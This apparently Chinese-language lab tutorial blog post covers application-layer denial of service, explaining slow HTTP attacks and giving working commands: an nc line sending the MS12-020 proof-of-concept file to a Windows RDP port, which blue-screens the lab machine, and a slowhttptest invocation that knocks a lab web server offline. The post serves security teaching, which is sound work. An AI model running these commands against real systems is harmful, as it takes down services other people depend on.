二十八、拒絕服務(wù)--(8)應(yīng)用層DoS

1、應(yīng)用服務(wù)漏洞

  • 服務(wù)代碼存在漏洞,遇異常提交數(shù)據(jù)時程序崩潰
  • 應(yīng)用處理大量并發(fā)請求能力有限,被拒絕的是應(yīng)用或OS

2、緩沖區(qū)溢出漏洞

  • 向目標(biāo)函數(shù)隨機(jī)提交數(shù)據(jù),特定情況下數(shù)據(jù)覆蓋臨近寄存器或內(nèi)存
  • 影響:遠(yuǎn)程代碼執(zhí)行、DoS
  • 利用模糊測試方法發(fā)現(xiàn)緩沖區(qū)溢出漏洞

3、測試 MS12-020遠(yuǎn)程桌面協(xié)議DOS漏洞

kali搜索

在18606.txt中查看其說明,http://aluigi.altervista.org/poc/termdd_1.dat在此路徑下,下載文件,然后按照說明執(zhí)行
windows xp開啟3389端口,然后執(zhí)行nc 192.168.50.185 3389 < termdd_1.dat進(jìn)行多次測試
開啟3389

開始執(zhí)行

導(dǎo)致藍(lán)屏后重啟

重啟

4、slowhttptest(源自google)

  • 低帶寬應(yīng)用層慢速DoS攻擊(相對于CC等快速攻擊而言的慢速)
  • 最早由Python編寫,跨平臺支持(linux、win、cygwin、osx)
  • 尤其擅長攻擊apache、tomcat,對windows的IIS幾乎無效
  • 大量應(yīng)用服務(wù)器和安全設(shè)備都無法防護(hù)慢速攻擊
    攻擊方法
  • 耗盡應(yīng)用的并發(fā)連接池,類似于http層的synflood
  • http協(xié)議默認(rèn)在服務(wù)器全部接收請求之后才開始處理,若客戶端發(fā)送速度緩慢或不完整,服務(wù)器時鐘為其保留連接資源池占用,此類大量并發(fā)將導(dǎo)致Dos
  • slowloris:完整的http請求結(jié)尾\r\n\r\n(正常情況下),攻擊方\r\n(攻擊情況下,只發(fā)送一個\r\n,服務(wù)端一直等待)
  • slow post:http頭content-length聲明長度,但body部分緩慢發(fā)送
  • slow read attack攻擊:與slowloris and slow post目的相同;不同之處在于請求正常發(fā)送,但慢速讀取響應(yīng)數(shù)據(jù);攻擊者調(diào)整TCP window窗口大小,是服務(wù)器慢速返回數(shù)據(jù)
  • Apache range header attack:客戶端傳輸大文件時,體積超過http body大小限制時進(jìn)行分段;耗盡服務(wù)器CPU、內(nèi)存資源

5、slowhttptest測試

輸入# man slowhttptest,可以看到四種模式

slowhttptest

模式參數(shù)

# slowhttptest -c 10000 -H -g -o my_header_stats -i 10 -r 1 -t GET -u http://192.168.50.183 -x 24 -p 3 -l 9999999
攻擊過程中
應(yīng)用服務(wù)為不可用
服務(wù)不可用

6、其他拒絕服務(wù)

  • 使用垃圾郵件塞滿郵箱
  • 無意識的/非故意的拒絕服務(wù)攻擊
    • 數(shù)據(jù)庫服務(wù)器宕機(jī)恢復(fù)后,引用隊列大量請求洪水涌來
    • 告警郵件在郵件服務(wù)器修改地址后洪水攻擊防火墻
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容